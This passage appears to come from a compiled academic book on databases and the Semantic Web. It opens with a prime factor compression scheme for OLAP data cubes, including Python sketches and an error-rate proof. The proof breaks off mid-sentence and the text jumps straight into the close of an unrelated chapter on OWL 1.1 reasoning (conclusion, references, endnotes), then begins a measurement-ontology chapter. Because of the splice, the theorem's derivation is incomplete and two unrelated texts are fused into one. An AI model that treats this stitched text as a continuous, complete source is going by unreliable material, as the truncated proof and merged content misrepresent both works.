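        difs = wta[pos:pos + len(data)]
        data = [v for a, d in zip(data, difs) for v in (a + d, a - d)]
        pos += len(difs)
    return data

exact = haar_decode([2.75, -1.25, 0.5, 0.0, 0.0, -1.0, -1.0, 0.0])
approx = haar_decode([2.75, -1.25, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])  # after thresholding
print(exact)    # [2.0, 2.0, 0.0, 2.0, 3.0, 5.0, 4.0, 4.0]
print(approx)   # every C(i) now deviates wherever dropped coefficients mattered
```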
Figure 1. The wavelet reconstruction process (each original coefficient C(i) is obtained from the WTA coefficients S(j) on the path from the root S(0) down to C(i))
Consider a scenario where S(4), although relatively large in comparison to S(0), S(1) and S(2), is thresholded out due to its lower weighting, thus leading to inaccuracies in the estimation of C(0) and C(1). This is symptomatic of the general case where the lower level coefficients are significant contributors to the reconstruction process but are thresholded out to make way for their more highly weighted ancestor coefficients. The problem is especially acute in the case of data that is both skewed and has a high degree of variability.
THE PRIME FACTOR SCHEME The scheme works broadly on the same lines as the wavelet technique in the sense that data compression is used to reduce the size of the data cube prior to processing of OLAP queries. OLAP queries are run on the compressed data, which is decoded to yield an approximate answer to the query. Our encoding scheme uses pre-processing to reduce the degree of variation in the source data
which results in better compression. An overview of the encoding process is given in the following section.
Overview of Prime Factor Encoding Scheme

Figure 2. Overview of the prime factor scheme (min-max scaling → chunking of scaled values → prime factor encoding → Elias encoding of the prime factor array, producing the encoded stream)

The data is first scaled using the standard min-max scaling technique. With this technique, any value V in the original cube is transformed into V', where V' = (V − min)·(nmax − nmin)/(max − min) + nmin, where min, max represent the minimum and maximum values respectively in the original data cube; nmin and nmax are the corresponding minimum and maximum values of the scaled set of values. Each scaled value V' is then approximated by its nearest prime number in the scale range [nmin, nmax]. The choice of nmin and nmax influences both the degree of compression and the error rate, as we shall show later in the "Experimental Setup" section. The rationale behind the scaling is to induce a higher degree of homogeneity between values by compressing the original scale [min, max] into
a smaller scale [nmin, nmax], with nmin ≥ min and nmax < max. In doing so, this pre-processing step improves the degree of compression. The scaled data cube is then partitioned into equal sized chunks. The size of the chunk c represents the number of cells that are enclosed by the chunk. The size of the chunk affects the decoding (query processing) time. Higher values mean fewer chunks need to be decoded, thus reducing the decoding time (see Theorem 3 in the section Online Reconstruction of Queries). Each chunk is encoded by the prime factor encoding algorithm which yields an array containing 2c cells. Although the encoded version has twice the number of cells it is much smaller in size since each cell is very small in numerical value. In fact, our experimental results reveal that the vast majority of values are very small integers (see Figures 10(a) and 10(b) in the Experimental Setup section). Figure 2 summarizes the prime factor encoding process. In addition to transforming values to very small integers, the other major benefit of the algorithm is that the integers are highly skewed in value towards zero. For example, on the census data set (U.S. Census), with a chunk size of 64, over 75% of the values turned out to be zero. These results were also borne out with the synthetic data sets that we tested our scheme on. The source (original) data in some of these data sets were not skewed in nature, showing that the skew was induced, rather than being an inherent feature of the original data. We exploited the skewed nature of the encoded data by using the Elias variable length coding scheme (Elias, 1975). Elias encoding works by encoding smaller integers in a smaller number of bits, thus further improving the degree of compression. The next section will describe the details involved in step 3 of the above process, the PFC encoding algorithm.
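A minimal sketch of these pre-processing steps is given below; the input values, the scale range, and the helper names are illustrative assumptions, and a production implementation would use a precomputed prime table.

```python
# Sketch of the pre-processing steps: min-max scaling into [nmin, nmax],
# chunking, and replacing each scaled value by its nearest prime.

def scale(values, nmin, nmax):
    lo, hi = min(values), max(values)
    return [(v - lo) * (nmax - nmin) / (hi - lo) + nmin for v in values]

def is_prime(n):
    if n < 2:
        return False
    return all(n % k for k in range(2, int(n ** 0.5) + 1))

def nearest_prime(x):
    n = round(x)
    for d in range(0, n + 2):           # search outwards from n
        if is_prime(n - d):
            return n - d
        if is_prime(n + d):
            return n + d
    return 2

def chunks(seq, size):
    return [seq[i:i + size] for i in range(0, len(seq), size)]

scaled = scale([120, 5, 260, 371], nmin=0, nmax=101)   # hypothetical cell values
print([nearest_prime(v) for v in chunks(scaled, 4)[0]])  # [31, 2, 71, 101]
```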
The Prime Factor Encoding Algorithm The algorithm takes as its input the scaled set of values produced by the min-max scaling technique. For each chunk, every scaled value is converted into the prime number that is closest to it. We refer to each such prime number as a prime factor. The algorithm makes use of two operators which we define below. Both operators α and β take as their input a pair of prime factors Vk and Vk+1. Definition 1: The operator α is defined by α(Vk ,V k+1) = nearest prime (Vk +V k+1 +I(V k+1)- I(Vk)), where I(V k+1), I(Vk) denote the ordinal (index) positions of V k+1 and Vk on the prime number scale. The operator takes two primes (V k ,V k+1) adds them together with the difference in index positions between the 2nd prime and the 1st prime and converts the sum obtained to the nearest prime number. Definition 2: The operator β is defined by β(Vk ,V k+1) = nearest prime(Vk +V k+1 ).
The α operator is applied pair-wise across all values (a total of c prime factors) in the chunk. This yields a stream of c/2 prime factors. The α operator is then applied recursively on the processed stream until a single prime factor is obtained. This recursive procedure gives rise to a tree of height log2c where c is the chunk size. We refer to this tree as the prime index tree. In parallel with the construction of the prime index tree we construct another tree, called the prime tree. The prime tree is constructed in the same manner as its prime index counterpart except that we apply the β operator, instead of the α operator. We illustrate the construction of the trees with the help of the following example. For the sake of simplicity we take the cube to be of size 4, the chunk size c to be 4 (i.e. we have only one chunk) and the scale range [nmin, nmax] to be [0, 101]. For the prime index tree (Figure 3(a)), the prime values 37 and 2 at the leaf level are summed as 37+2+I(2)-I(37), which is transformed to its nearest prime number, 29. Similarly 71 and 97 when processed yield the prime number, 173.
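A compact sketch of one chunk's encoding is given below, using the example chunk {37, 2, 71, 97}. The prime-index convention (a pseudo-prime 0 at position 0, primes from 2 upwards) and the nearest-prime tie-breaking are assumptions of this sketch, although they reproduce the differentials E = {5, -2, 1} discussed below.

```python
# Sketch of one chunk's encoding: build the prime tree (beta) and the prime index
# tree (alpha) bottom-up and record the index differentials E.

def is_prime(n):
    return n > 1 and all(n % k for k in range(2, int(n ** 0.5) + 1))

PRIMES = [0] + [p for p in range(2, 1000) if is_prime(p)]
INDEX = {p: i for i, p in enumerate(PRIMES)}

def nearest_prime(n):
    return min(PRIMES, key=lambda p: (abs(p - n), p))   # ties -> smaller prime

def alpha(v, w):                       # prime index tree operator
    return nearest_prime(v + w + INDEX[w] - INDEX[v])

def beta(v, w):                        # prime tree operator
    return nearest_prime(v + w)

def build(leaves, op):
    levels = [leaves]
    while len(levels[-1]) > 1:
        prev = levels[-1]
        levels.append([op(prev[i], prev[i + 1]) for i in range(0, len(prev), 2)])
    return levels

leaves = [37, 2, 71, 97]
pit = build(leaves, alpha)             # [[37, 2, 71, 97], [29, 173], [233]]
pt = build(leaves, beta)               # [[37, 2, 71, 97], [37, 167], [199]]
E = [INDEX[a] - INDEX[b]
     for la, lb in zip(pit[:0:-1], pt[:0:-1]) for a, b in zip(la, lb)]
print(E)                               # [5, -2, 1]
```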
Figure 3(a). The construction of the prime index tree (leaves 37, 2, 71, 97; internal nodes 29 and 173; root 233)
Figure 3(b). The construction of the prime tree (leaves 37, 2, 71, 97; internal nodes 37 and 167; root 199)
The node values 29 and 173 in turn yield a root value of 233. As shown in Figure 3(b), the leaf values 37 and 2 when summed and converted into its nearest prime yields a value of 37. Following the same process, we obtain values of 167 and 199 for the remaining nodes. We annotate each internal node by its corresponding index value. The encoded array E now consists of the differences in index positions across corresponding positions in the two trees. These differences are referred to as differentials. For the example in Figure 3 the array turns out to be E = {5, -2, 1}. We also store the index value of each prime tree root separately in another array R. Each chunk gives rise to its own prime tree root, and for the simple example above, since we have only one chunk, this results in a single value {47} for R. Decoding requires the use of the two arrays E and R. We start with the first value in array R, which is 47, and then add it to the first value in array E which is 5, yielding the value 52. We use 52 as an index into a table of primes (this table has the pseudo prime 0 added to it with index value 0) and extract 233 as the corresponding prime value. We now search for pairs of primes (P1, P2) which satisfy the condition:
α(P1, P2) = 233, β(P3, P4) = 199, I(P3) = I(P1) + 2 and I(P4) = I(P2) − 1 ——— (1),
where P3, P4 are the nodes corresponding to P1, P2 in the prime tree.
This search in general would yield a set S of candidate pairs for (P1, P2) rather than a single pair. In order to extract the correct pair, we associate an integer with each internal node of the prime index tree which records the ordinal position within the set S that enables us to descend to the next level of the tree. In this case this integer turns out to be 0, since there is only one pair that satisfies condition (1). These integers are collectively referred to as offsets. The complete set of offsets for the tree above is {0, 0, 0}. The complete version of E contains the sequence of differentials followed by the sequence of offsets. Thus for our example we have E = {5, -2, 1, 0, 0, 0}. We are now able to decode by descending both trees in parallel and recover the original set of leaf values 37, 2, 71 and 97. For ease of understanding, the encoding process above has been described for the 1-dimensional case. The extension to d dimensions follows naturally by encoding along each dimension in sequence. For example, if we have a 2-dimensional cube we would first construct 2-dimensional chunks. With a chunk size of 16 and the use of equal width across each dimension, each chunk would consist of a 4 by 4 2-d array. We first run the encoding process across dimension D1. This would yield a 1-dimensional array consisting of 4 prime root values for each chunk. The differentials and offsets that result from this encoding are stored in a temporary cache. The 4 prime root values from encoding on D1 are then subjected to the encoding process across dimension D2 to yield the final encoding. The differentials and offsets that result from encoding along D2 are merged with those from encoding along dimension D1 to yield the final set of encoded values.

Encoding Performance
The encoding takes place in four steps as given in Figure 2. Steps 1 and 2, involving scaling and chunking, can be done together. As data is read, it can be scaled on the fly with the chunking process. If the original data is stored in dimension order (D1, D2, …, Dd) with the rightmost indices changing more rapidly, then it can be shown that the I/O complexity involved in chunking is O((N/B) · log_{M/B}(N/B)),
where M is the available memory size and B is the block size of the underlying database system. The reader is referred to (Vitter, 1999) for a proof. The I/O complexity of steps 3 and 4 is O(N/B).
Thus the I/O complexity is bounded by the O((N/B) · log_{M/B}(N/B)) term required for the chunking step. However, it should be noted that this only reflects a one-time cost in reorganizing the data from dimension order to chunked format. Once this is done, no further chunking is required, as updates to values do not affect the chunk structure. Thus, the time complexity on a regular basis would be bounded above by O(N/B).
The only exception occurs when the dimensions are reorganized and either grow or shrink as a result. This would require repetition of the chunking step.
The Rationale behind the Prime Factor Algorithm Prime numbers provide us with a natural way of constraining the search space since they are much less dense than ordinary integers. The first 100 positive integers are distributed across only 25 primes. At the same time the primes themselves become less dense as we move up the integer scale (Andrews, 1994). The next 900 positive integers after 100 only contain 143 primes. This means that the prime number encoding technique has good scalability with respect to data value size.
From the error point of view the use of primes introduces only small errors as it is possible to find a prime in close neighborhood to any given integer (Andrews, 1994). Theorem 1 gives the distribution of primes in the general case. Theorem 1: The number of prime numbers less than or equal to a given number N approaches N / log_e(N)
for large N. Proof: The reader is referred to (Andrews, 1994) for a proof. Theorem 1 reinforces the observations made above. First, the division by the logarithm term ensures that the primes are less dense than ordinary integers. Second, the average gap between a given prime N and its successor is approximately N / (N / log_e N) = log_e N. This means that encoding a number N using its nearest prime will result in an absolute error of (1/2) · log_e N
on the average. These properties make prime numbers an attractive building block for encoding numerical data. The basic idea that we utilize is to convert a stream of primes into a single prime, the prime tree root value by a series of pair wise add operations. We then augment the root value with a set of coefficients to enable us to decode. The use of prime numbers enables us to drastically reduce the search space involved in decoding and as a consequence reduce the space required to store the encoded data. As an example, consider the prime root value of 29. In order to decode (assuming that
we simply use the prime tree) to the next level we have to consider just eight combinations (5,23), (23,5), (7,23), (23,7), (11,19), (19,11) , (13, 17) and (17,13). On the other hand if prime numbers were not used as the basis, then we would have a total of 30 combinations to consider—in general, if N were the prime root, then N+1 combinations would have to be tested. The use of the prime index tree in conjunction with the prime tree enables us to constrain the search space even further. With the introduction of the former we are able to distinguish between pairs such as (5,23) and (23,5). The pair (5,23) encodes as 31 in the Prime Index tree and 29 in the prime tree, whereas (23,5) encodes as 23 in the prime index tree and 29 in the prime tree. Apart from this, the other major benefit of growing two trees instead of one is that we can encode taking the differentials between corresponding nodes across the two trees rather than node values themselves. Since the two trees evolve from a common set
of leaf values, the α and β operators evaluate to approximately the same values which in turn causes the differentials to be much smaller than the node values themselves (see Figure 10(a) in the “Experimental Setup” section).
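The way condition (1) prunes the decode search can also be illustrated in code: knowing the two roots (233 and 199) and the child differentials (−2 and +1), we enumerate candidate child pairs. The index and tie-breaking conventions are assumptions of this sketch, and the stored offset is what selects the correct pair among the candidates.

```python
# Sketch of the decode search constrained by condition (1).

def is_prime(n):
    return n > 1 and all(n % k for k in range(2, int(n ** 0.5) + 1))

PRIMES = [0] + [p for p in range(2, 400) if is_prime(p)]
INDEX = {p: i for i, p in enumerate(PRIMES)}

def nearest_prime(n):
    return min(PRIMES, key=lambda p: (abs(p - n), p))

def alpha(v, w):
    return nearest_prime(v + w + INDEX[w] - INDEX[v])

def beta(v, w):
    return nearest_prime(v + w)

candidates = []
for p1 in PRIMES[1:]:
    for p2 in PRIMES[1:]:
        i3, i4 = INDEX[p1] + 2, INDEX[p2] - 1     # imposed by the differentials
        if not (0 <= i3 < len(PRIMES) and 0 <= i4 < len(PRIMES)):
            continue
        p3, p4 = PRIMES[i3], PRIMES[i4]
        if alpha(p1, p2) == 233 and beta(p3, p4) == 199:
            candidates.append(((p1, p2), (p3, p4)))

print(len(candidates))
print(((29, 173), (37, 167)) in candidates)   # True: the stored offset picks it
```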
Encoding Error Rate for the Prime Factor Algorithm
In this section we present a formal analysis for the average relative error involved in decoding with the prime factor scheme. Theorem 2 quantifies this error rate. Theorem 2: The average relative error is approximately (1/(2V)) · log_e(C·V), where C is the chunk size and V is the average value of an element within a chunk. Proof Sketch: Consider the prime tree given in Figure 4 with chunk size 8.
Figure 4. Error tree for Chunk Size 8
The value of an internal node, say P9, is given by P9 = P1 + P2 + Δ_{P2,P1}, where Δ is an error term that denotes the approximation to the nearest prime number. Similarly, P10 = P3 + P4 + Δ_{P4,P3} and P13 = P9 + P10 + Δ_{P10,P9}. Substituting for P9 and P10 in the expression for P13 we obtain P13 = P1 + P2 + P3 + P4 + Δ_{P2,P1} + Δ_{P4,P3} + Δ_{P10,P9}. Thus it can be seen that a parent node's value is given by the sum of the leaf node values that can be reached from the parent node plus the error terms at the intermediate node levels. In general, we have P_{2C-1}, the root node value, given by

P_{2C-1} = ∑_{i=1}^{C} P_i + ∑_{i=1}^{C-1} Δ_{P_{2i},P_{2i-1}}    (1)

Each error can now be written as

Δ_{P_{2i},P_{2i-1}} = (1/2) · log_e(K_i T).

Thus, from (1), the total error is approximately

(1/2) ∑_{i=1}^{C-1} log_e(K_i T) ≈ (1/2) ∑_{i=1}^{C-1} log_e(K_i) + (1/2)(C − 1) log_e(T)
≈ (1/2) ∑_{i=1}^{C-1} (K_i − 1) + (1/2)(C − 1) log_e(T),

using the Taylor series expansion for the log function and taking a first-order approximation for 0 ≤ K_i ≤ 2. From the definition of K_i, we have

∑_{i=1}^{C-1} K_i ≈ log_2(C).

The sum of the values T in the chunk is given
beauty of OWL 1.1 reasoning is that it always terminates and produces a correct result – this is guaranteed by the relatively tough syntactic limitations on OWL 1.1 expressivity – remember, that due to these limitations we could not express in OWL 1.1 one of the original (not so complex) constraints, that students may take only courses included in the same AcademicProgram to which the student has enrolled. The next block of reasoner output is Classification. This output is not directly relevant for specific SPARQL queries, but is considered useful for other ontology applications – it shows the inferred subsumption graph between all classes and the most specific class for each individual. Even for our university enrollment dataset this classification result clearly shows that Student3 and Teacher3 have dual roles. Finally, the line “Consistent: Yes” is one of the most important output lines. It assures that the whole ontology, its constraints, and data are consistent (do not lead to any logical contradictions). Consistency there is checked in a rather strong manner: the reasoner checks that all ontology classes are satisfiable (can possibly have any instances). This is a very useful ontology debugging tool, because, obviously, it makes no sense to have unsatisfiable classes in the ontology and therefore clearly indicates an error. In case ontology turns out to be inconsistent (unsatisfiable), the Pellet reasoner outputs a detailed explanation of which ontology triples have caused the contradiction. We will conclude this very brief introduction to OWL 1.1 reasoning with restating that reasoning can be viewed as a very powerful extension to the SPARQL querying engine of the more traditional RDF databases. But this extension comes at a cost – slower query execution and OWL 1.1 limitations compared to the OWL Full expressivity. Nevertheless, it is always advisable to try to stay within OWL 1.1 limits – even if not everyone will use such ontologies with a reasoner, the reasoning possibility enables much
deeper level of debugging and more flexible uses for such ontologies.
CONCLUSION
In this chapter we have discussed the outstanding new possibilities enabled by the use of RDF/OWL technology alongside traditional relational database systems. The benefits range from reuniting the conceptual model of the database (OWL ontology) with the actual data (RDF data) for enabling direct, semantically meaningful SPARQL queries, to the possibility of using a powerful description logic reasoner for advanced queries and conceptual model debugging. No database is complete in itself; almost all databases contain information that can be combined with the information in other databases. Connecting these diverse data sources is a challenging task which can be supported by ontologies describing them. Although there are traditional meta-search engines and data mining tools for a number of databases relying on hand-fitted interfaces, these have to be refitted after every change in the database schema. The new approach would allow for more generic query systems and ontology and data browsing applications, including graphic ones in the style of (Athanasis, 2004; Berners-Lee, 2006). This would substantially ease the task for a user of finding data across the different databases which use these ontologies.
ONGOING AND FUTURE RESEARCH DIRECTIONS
Here we would like to bring attention to a few more radical development directions, which have been largely omitted in the main body of the chapter due to their present immaturity. Nevertheless, the following research directions are likely to shape the future of this research area.
• Integration of multiple databases through their ontology mapping to a common upper ontology. This approach has generally failed on the global Semantic Web scale, but it is completely realistic on even a large enterprise scale. The development of standard and widely accepted ontologies (or just vocabularies) for narrow domains, such as DublinCore, FOAF, and lately SIOC, is facilitating this process, along with national ontology standardization initiatives (Hyvonen, 2007; Niemann, 2007).
• The need for a bidirectional SPARQL extension with support for CREATE, DELETE, and UPDATE statements. The Semantic Web was initially envisioned as a distributed read-only medium similar to the classic Web, but the current embracing of these technologies as a potential substitute for relational databases also requires a bidirectional query language. One of the developments in this direction is the SPARQL/Update language (nicknamed "SPARUL").
• RDF quad stores are a new trend in RDF database design, where each RDF triple is complemented with a fourth URI pointing to the "Named Graph" (source file or database) from which this particular RDF triple has been generated. Quad stores are a simple and yet effective solution to RDF data versioning, access-rights management, and finally also to the management of trust in various RDF data sources.
REFERENCES An, Y., Borgida, A., & Mylopoulos, J. (2005). Inferring complex semantic mappings between relational tables and ontologies from simple correspondences. In ODBASE’05, (pp.1152-1169). Athanasis, N., Christophides, V., & Kotzinos, D. (2004). Generating on the fly queries for the
Semantic Web: The ICS-FORTH Graphical RQL interface (GRQL). In LNCS, 3298, 486-501. Baader, F., Calvanese, D., McGuinness, D.L., Nardi, D., & Patel-Schneider, P.F. (2003). The description logic handbook: Theory, implementation, applications. Cambridge University Press. Barzdins, J., Barzdins, G., Balodis, R., Cerans, K., et.al. (2006). Towards semantic latvia. In Communications of 7th International Baltic Conference on Databases and Information Systems (pp.203-218). Berners-Lee, T. (1998). Relational databases on the Semantic Web. Retrieved December 15, 2007, from http://www.w3c.org/DesignIssues/RDBRDF.html Berners-Lee, T., et.al. (2006). Tabulator: Exploring and analyzing linked data on the Semantic Web. LNCS, 4273, 158-171. Berners-Lee, T., Hendler, J., & Lassila, O. (2001, May 29-37). The Semantic Web. Scientific American. Bizer, C., & Cyganiak, R. (2006). D2R server Publishing releational databases on the Semantic Web. In Poster at the 5th International Semantic Web Conference. Retrieved December 15, 2007, from http://sites.wiwiss.fu-berlin.de/suhl/bizer/pub/Bizer-Cyganiak-D2R-Server-ISWC2006. pdf Borgida, A. (2007). Knowledge representation meets databases – A view of the symbiosis. In Proceedings of the 20th international workshop on Description Logics. CEUR Workshop Proceedings, 250, 1-11. Retrieved December 15, 2007, from http://ceur-ws.org/Vol-250/invited_3.pdf Hepp, M., & Bruijn, J. (2007). GenTax: A generic methodology for deriving OWL and RDFS ontologies from hierarchical classification, thesauri, and inconsistent taxonomies. LNCS, 4519, 129-144.
Hyvonen, E., Viljanen, K., Makela, E., et al. (2007). Elements of a National Semantic Web infrastructure - Case study Finland on the Semantic Web. In Proceedings of the First International Semantic Computing Conference (IEEE ICSC 2007), IEEE Press. Kupfer, A., Eckstein, S., Neumann, K., & Mathiak, B. (2006). Keeping track of changes in database schemas and related ontologies. In Communications of 7th International Baltic Conference on Databases and Information Systems (pp.63-68). Laborda, C.P., & Conrad, S. (2006). Bringing relational data into the Semantic Web using sparql and relational.owl. In Proc. of the 22nd Int. Conf. on Data Engineering Workshops (ICDEW’06), (pp. 55-62). Niemann, B.L. (2007). New enterprise data management strategy for the U.S. Government: Support for the Semantic Web. In W3C Workshop on RDF Access to Relational Databases. Retrieved December 15, 2007, from http://www. w3.org/2007/03/RdfRDB/papers/niemann.doc ODM (2007). Ontology definition metamodel. OMG Adopted Specification, Document Number: ptc/2007-09-09. Retrieved December 15, 2007, from http://www.omg.org/docs/ptc/07-0909.pdf OWL (2004). Web ontology language (OWL). W3C Specification. Retrieved December 15, 2007, from http://www.w3.org/2004/OWL/ OWL 1.1 (2006). OWL 1.1 Web ontology language. Submission Request to W3C. Retrieved December 15, 2007, from http://www.w3.org/ Submission/2006/10/ Sirin, E., & Parsia, B. (2007b). SPARQL-DL: SPARQL Query for OWL-DL. In Proceedings of the 3rd OWL Experiences and Directions Workshop (OWLED-2007). CEUR Workshop Proceedings, Vol 258. Retrieved December 15, 2007, from http://ceur-ws.org/Vol-258/paper14.pdf
Sirin, E., Parsia, B., Cuenca Grau, B., Kalyanpur, A., & Katz, Y. (2007a). Pellet: A practical OWLDL reasoner. Web Semantics: Science, Services and Agents on the World Wide Web, 5(2), 51-53. SPARQL (2007). SPARQL query language for RDF. W3C proposed recommendation. Retrieved December 15, 2007, from http://www.w3.org/TR/ rdf-sparql-query Tsarkov, D., & Horrocks, I. (2006). FaCT++ description logic reasoner: System description. Lecture Notes in Artificial Intelligence, 4130, 292-297. Yuan, J., & Jones, G.H. (2007). Enabling Semantic access to enterprise RDB data. In W3C Workshop on RDF Access to Relational Databases. Retrieved December 15, 2007, from http://www. w3.org/2007/03/RdfRDB/papers/yuan.html
ADDITIONAL READING
As it was mentioned in the introduction, most of the tools and approaches described in this chapter are still under active research or development. Therefore it is impossible to recommend any solid introductory textbook which would not be outdated. To follow up-to-date developments, our recommended additional reading starting point is the materials of the latest W3C Workshop on RDF Access to Relational Databases, available online.
ENDNOTES
a. The class „Thing” is introduced in the UML diagram only to state that classes „Person”, „Course”, „PersonID”, and „AcademicProgram” are disjoint. Due to the semi-formal semantics of classic UML, such high-level disjointness statements are seldom used in traditional UML diagrams – it is typically assumed that these diagrams will be used only by humans capable of guessing the disjointness of the classes from their meaningful names. As a counter-example, classes „Student” and „Female”, if used within the same UML diagram, would not be assumed to be disjoint by the human reader.
b. A similar commercial tool, VOM (Visual Ontology Modeler), is developed by the Sandpiper company and is available as an add-in to IBM's Rational Rose product.
c. Throughout this chapter we use the OWL/N-TRIPLES ontology serialization format, because it is equivalent to the „RDF triples” format used later for data export and SPARQL queries over RDF databases. Unfortunately, many tools, such as Protégé and IODT, store ontologies in OWL/XML format and do not support the OWL/N-TRIPLES format directly. As a workaround, the Sesame RDF database (discussed at the end of this Section) can be used to convert ontologies between OWL/XML and OWL/N-TRIPLES formats.
d. Description Logic is a generic term for a wide variety of specific (syntactically recognizable) subsets of FOL. For example, OWL 1.1 corresponds to the SROIQ subset of FOL.
e. OWL 1.1 is the largest algorithmically decidable subset of OWL Full, for which complete reasoners like Pellet and FaCT++ are available. OWL Lite and OWL DL are subsets of OWL 1.1 introduced at earlier stages of OWL language development. In this chapter we use OWL 1.1.
f. OWL reasoners are often used via the DIG or OWL API interface from ontology editors like Protégé, but for the purposes of this chapter the native SPARQL interface of the Pellet reasoner is more suitable.
g. The Pellet reasoner can read the OWL/N-TRIPLES format directly. Therefore the N-TRIPLES from the mentioned Figures 6, 8, and 12 can be literally given to Pellet to reproduce the results shown in Figure 13.
APPENDIX: QUESTIONS FOR DISCUSSION
1. Why is it hard to merge ontologies of disparate data sources even if they include complementary information about the same objects? (Conceptualizations used in different application domains are often incompatible.)
2. Why are relational databases and SQL queries generally faster than corresponding RDF stores and SPARQL queries? (RDF can encode an arbitrary graph, not just linked tables.)
3. Why are OWL reasoners (such as Pellet or FaCT++) not universally applicable? (Because not all real-life integrity constraints can be encoded in OWL 1.1.)
This work was previously published in Semantic Web Engineering in the Knowledge Society, edited by J. Cardoso and M. Lytras, pp. 242-266, copyright 2009 by Information Science Reference (an imprint of IGI Global).
Chapter 8.2
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web Henry M. Kim York University, Canada Arijit Sengupta Wright State University, USA Mark S. Fox University of Toronto, Canada Mehmet Dalkilic Indiana University, USA
ABSTRACT
This article introduces a measurement ontology for Semantic Web applications, specifically for emerging domains such as microarray analysis. The Semantic Web is the next-generation Web of structured data that are automatically shared by software agents, which apply definitions and constraints organized in ontologies to correctly process data from disparate sources. One facet of developing Semantic Web ontologies of emerging domains is creating ontologies of concepts that are common to these domains. These general "common-sense" ontologies can be used as building blocks to develop more domain-specific ontologies. However, most measurement ontologies concentrate on representing units of measurement and quantities, and not on other measurement concepts such as sampling, mean values, and evaluations of quality based on measurements. In this article, we elaborate on a measurement ontology that represents all of these concepts. We present the generality of the ontology and describe how it is developed, used for analysis, and validated.
INTRODUCTION
According to Tim Berners-Lee, widely credited as the inventor of the World Wide Web, the Web will evolve into the Semantic Web, which relies upon machine-processable domain knowledge represented in ontologies to execute and compose automated Web services (Berners-Lee, Hendler, & Lassila, 2001; Chen, Zhou, & Zhang, 2006). An ontology is a data model that "consists of a representational vocabulary with precise definitions of the meanings of the terms of this vocabulary plus a set of formal axioms that constrain interpretation and well-formed use of these terms" (Campbell & Shapiro, 1995). Ontology use ensures that data instances are so precisely defined and constrained that the instances can be processed automatically and accurately by Web-based computer programs, or software agents. Berners-Lee et al.'s (2001) vision of the Semantic Web is that "many software agents, accessing data instances and applying ontologies to the instances, execute Web services in concert, where agents, data instances, and ontologies are distributed all over the Web." Ontologies for the Semantic Web represent an emerging method for modeling the semantics required to interpret data. In a similar vein, applications such as genomics and geographic information systems represent emerging domains for semantic modeling. There exist Semantic Web ontologies for traditional applications in computer science and business (Davies, Duke, & Stonkus, 2002; Gandon & Sadeh, 2004; Klischewski & Jeenicke, 2004). There are also emerging domains modeled using traditional semantic modeling techniques (Khatri, Ram, & Snodgrass, 2004; Ram & Wei, 2004). There are even some ontologies of emerging domains, such as representations of the Gene Ontology (Ashburner et al., 2000; Wroe, Stevens, Goble, & Ashburner, 2003) and a bioinformatics ontology (Stevens, Goble, Horrocks, & Bechhofer, 2002), which are represented in the de facto Semantic Web Ontology Language,
OWL (McGuinness & van Harmelen, 2003), or its predecessor, DAML+OIL (Bechhofer, Goble, & Horrocks, 2001). Although one of the goals of ontology development is a generalization of terms in an application, it is possible to make intelligent choices when several ontologies are available for the same domain (Lozano-Tello & Gomez-Perez, 2004). When contemplating the development of ontologies of any domain, it is instructive to state the following informal definition: "an ontology is an explicit representation of shared understanding" (Gruber, 1993). Gruber also outlines the conundrum of ontological commitment: the more one commits to representing a given domain in an ontology to make data more sharable for software applications closely associated with that domain's needs, the less sharable the data become for other applications. For example, commitments made to develop a gene ontology useful for genomics applications render the ontology less likely to be used to share medical records data. Yet data sharing between genomics and patient care applications is critical in many situations. The remedy to this seeming conundrum is to identify general concepts that cut across many domains—the domains' "common-sense"—and collect them in a common-sense ontology (Lenat, 1995; Milton & Kazmierczak, 2004). This ontology is separated from more domain-specific ones. In fact, terms in several domain-specific ontologies can be defined using terms from a common general ontology. For example, a molecular biology ontology may provide building-block representations for a biomedical ontology, which in turn underpins both gene and health care ontologies. The general ontologies also underlie an ontology of a different perspective—that of costing (Fox & Gruninger, 1998). Arguably, the ontologies of emerging domains, to be discussed below, make ontological commitments to their respective domains. It is prudent to ask, however, what are the common-sense ontologies that underlie these emerging domains?
Can their representations serve as building blocks to define Semantic Web ontologies of different emerging domains? The attribute shared among emerging domains, which sets them apart from traditional business and computer science domains, is their grounding in the physical sciences. The common-sense of emerging domains is the common-sense of our physical world. There are common-sense models of time (Allen, 1983), space (Retz-Schmidt, 1988), causality (Reiger & Grinberg, 1977), and physics (Hayes, 1985; Kuipers, 1986). So how do traditional and emerging domains differ? We set our sights on the life sciences, since it is here that the most significant number of emerging technologies have appeared. The life sciences have relied on the so-called scientific method—discovery through a process of observation, hypothesis formulation, and data generation. In these traditional domains, data play an ancillary role to the hypotheses (these domains are often referred to as "hypothesis driven"). For example, a scientist believes that two particular genes might have some kind of relationship in some stage of larval development in D. melanogaster. Experiments are then conducted to validate this conjecture. The data are generally interesting only in the context of this experiment. There are long-standing traditional as well as practical reasons (Attie, 2003) why data are put into this ancillary role, and we present only a few here: data need not be present during the observation and hypothesis formulation phases of discovery; a surplus of data usually does little to enhance this process of discovery; and data are often prohibitively expensive to produce or gather once, let alone many times. Emerging domains (Ronco, Grossel, Zimmer, & Socash, 2003), like bioinformatics (and its particular areas of focus, for example, genomics, proteomics, and metabolomics), have, as a direct consequence of recent and rapid advances in technology, taken the scientific method and made it, in a sense, stand on its head. There are also domains
where data are generated and discoveries made without any preceding hypothesis (Attie, 2003); these are often referred to as "technologically driven." Technology in this case typically refers to high-throughput gene product data, where tens of thousands of interactions are measured in unison. To motivate our article, we will focus on microarrays (Duggan, Chen, Meltzer, & Trent, 1999; Mount, 2004), the most well-known and ubiquitous of the technologically driven data tools. Numerous challenges are faced by these emerging disciplines. One critical problem is data quality—many of the high-throughput techniques, microarrays included, suffer from a great deal of noise (Lesk, 2005). Furthermore, no formal ANSI standards exist for managing these data systematically, though some informal standards have emerged. One such standard is the MIAME format for microarrays (Duggan, Chen, Meltzer, & Trent, 1999; Mount, 2004), though this format does not include quality control information. So, handling data quality is made even more difficult, and it can be cast into a more general framework of measurement. There is the abstract and mathematical field of measurement theory (Roberts, 1979), which serves as a valuable reference for those works that represent measurement concepts in an ontology. Whether stated in formal data models (Goh, Bressan, Madnick, & Siegel, 1999; Novak, 1995) or as computational ontologies (Gruber & Olsen, 1994), works that can be considered ontologies of measurement are predominantly concerned with units of measurement, specifically using the ontology to accurately convert from one unit of measure to another. This holds for Semantic Web measurement ontologies for traditional domains; some examples are the measurement ontologies of the KSL (Fikes & Farquhar, 1999), SHOE (Heflin, 2000), Cyc® (Lenat, 1995), SUMO (Pease & Niles, 2002), and 